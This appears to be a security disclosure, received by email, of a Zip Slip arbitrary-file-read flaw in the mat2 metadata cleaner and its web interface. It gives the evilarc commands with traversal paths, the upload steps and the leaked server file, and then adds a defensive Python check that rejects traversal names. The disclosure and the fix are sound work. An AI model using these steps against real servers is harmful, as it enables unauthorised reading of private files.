Arbitrary read via malicious zip file
[As received by email, sent by jfriedli]
Heyo
I found an issue in mat2. It is vulnerable to the Zip slip vulnerability.
Here's a little summary :)
Create malicious file
Script used to create a Zip Slip file: https://github.com/ptoomey3/evilarc/blob/master/evilarc.py
python2.7 evilarc.py filename_to_extract.txt -d 0 -o "unix" -p "../../../home/kali/Documents/projects"
where filename_to_extract.txt is the filename of the file you want to extract from the victim system.
Note: it has to be an extension supported by mat2.
mat2 evil.zip
and upon extracting the cleaned zip file you receive the file from the victim.
Example Extracting Requirements.txt From Webserver
Create the empty target file we want to extract.
touch requirements.txt
We know the absolute path of the target file on the server from the Dockerfile.
python2.7 path_tra.py requirements.txt -d 0 -o "unix" -p "../../../var/www/mat2-web/"
Creating evil.zip containing ../../../var/www/mat2-web/requirements.txt
Check if the path and filename are correct.
cat evilzip
PK�m�T*../../../var/www/mat2-web/requirements.txtPK�m�T*�t2-web/requirements.txtPKXH
Then upload the file via the web interface and download the cleaned zip.
Afterward we unzip it.
unzip evil.cleaned.zip
Archive: evil.cleaned.zip
warning: skipped "../" path component(s) in ../../../var/www/mat2-web/requirements.txt
extracting: var/www/mat2-web/requirements.txt
And we can prove that we received the content of the requirements.txt from the server.
cat var/www/mat2-web/requirements.txt
mutagen==1.45.1
ffmpeg==1.4
bubblewrap==1.2.0
mat2==0.12.4
flask==2.1.2
Flask-RESTful==0.3.9
Flask-Cors==3.0.10
Cerberus==1.3.4
Flask-Testing==0.8.1
blinker==1.4
flasgger==0.9.5
Flask-Assets==2.0
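Added example (written for this page, not code from the report or from mat2): a pre-extraction check that rejects any archive member whose path would resolve outside the working directory, exercised against a constructed in-memory zip that carries the traversal member name shown in the report. The working directory /tmp/mat2-work is an assumed value.

```python
import io
import os
import zipfile


def escapes_dir(dest_dir: str, member_name: str) -> bool:
    """True if extracting (or re-reading) member_name relative to dest_dir
    would land outside dest_dir: absolute path, drive letter, or '..' walk."""
    base = os.path.realpath(dest_dir)
    # Zip names use '/', but treat '\' as a separator as well.
    name = member_name.replace("\\", "/")
    if name.startswith("/") or os.path.isabs(name) or os.path.splitdrive(name)[0]:
        return True
    target = os.path.realpath(os.path.join(base, name))
    # commonpath (not startswith) so that '../mat2-work2/x' is also rejected.
    return os.path.commonpath([base, target]) != base


def unsafe_members(archive: zipfile.ZipFile, dest_dir: str) -> list:
    """Every member name that must be refused before the archive is touched:
    the check has to run on the name, not on what an extractor silently rewrote."""
    return [info.filename for info in archive.infolist()
            if escapes_dir(dest_dir, info.filename)]


def build_sample_zip() -> bytes:
    """Constructed sample: one benign member plus one traversal member
    whose name mirrors the one shown in the report above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "benign content\n")
        zf.writestr("../../../var/www/mat2-web/requirements.txt", "")
    return buf.getvalue()


def check_sample(dest_dir: str = "/tmp/mat2-work") -> list:
    """Run the check over the constructed sample; dest_dir is an assumed path."""
    with zipfile.ZipFile(io.BytesIO(build_sample_zip())) as zf:
        return unsafe_members(zf, dest_dir)


if __name__ == "__main__":
    print("rejected members:", check_sample())
```

A processor that extracts members one by one and later reopens them by joining the original member name onto the working directory needs this check on the name itself, because a sanitising extractor only protects the write, not the subsequent read.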